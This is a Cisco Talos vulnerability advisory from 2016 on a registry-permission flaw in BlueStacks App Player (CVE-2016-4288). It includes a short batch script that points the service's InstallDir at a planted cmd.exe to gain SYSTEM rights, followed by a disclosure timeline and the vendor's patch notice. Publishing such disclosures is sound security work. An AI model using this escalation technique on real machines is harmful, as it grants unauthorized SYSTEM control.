Wednesday, August 10, 2016

Vulnerability Spotlight: BlueStacks App Player Privilege Escalation

Discovered by Marcin ‘Icewall’ Noga of Cisco Talos


Talos is releasing an advisory for a vulnerability in BlueStacks App Player. (TALOS-2016-0124/CVE-2016-4288). The BlueStacks App Player is designed to enable Android applications to run on Windows PCs and Macintosh computers. It’s commonly used to run popular Android games on these platforms.

Details

A weak registry key permission vulnerability exists in the BlueStacks application. By default the BlueStack installer sets a weak permission to the registry key, which contains InstallDir reg value, this can be used later by the BlueStacks service component. This default configuration gives a malicious user the ability to modify this value, which can lead to privilege escalation.

 Let’s examine the BlueStacks registry key where vulnerable "InstallDir" value is located:



As we can see the "Users" group has full access permissions to this key.


The BlueStacks service reads from this registry location to obtain the installation directory setting, and later attempts to run an executable (HD-Network.exe) from the location it receives. Setting the InstallDir value data on a user specified location, the malicious user can execute the chosen file with SYSTEM rights.

Exploit

@echo off
echo [+]Run cmd as SYSTEM
mkdir c:\TALOS
REM copy other files for execution
copy c:\windows\system32\cmd.exe HD-Network.exe
reg add "HKLM\SOFTWARE\BlueStacks" /f /v "InstallDir" /t REG_SZ /d c:\TALOS\
echo [+]Restore default values

Conclusion

Finding and responsibly disclosing zero-day vulnerabilities helps improve the overall security of the software people use on a day-to-day basis. Cisco Talos is committed to this effort by developing programmatic ways to identify vulnerabilities that could otherwise be exploited by malicious adversaries. This helps secure the platforms and software customers use and also helps provide insight into how Cisco can improve its own processes to develop better, more secure products.

Since this is a purely local vulnerability which involves no network traffic, Talos has not released any rules for this issue. 

Timeline

2016-03-01 - Discovery
2016-04-13 - Reported
2016-08-04 - Patched
2016-08-04 - Released

1 comment:

  1. BlueStacks has addressed this issue in release version 2.4.43.6254 (and later). The software is publicly available for download at http://www.bluestacks.com/. We have issued software updates for past releases and are also actively advising existing users to upgrade to the latest release of BlueStacks.

    Thank you
    BlueStacks Support

    ReplyDelete

Post a Comment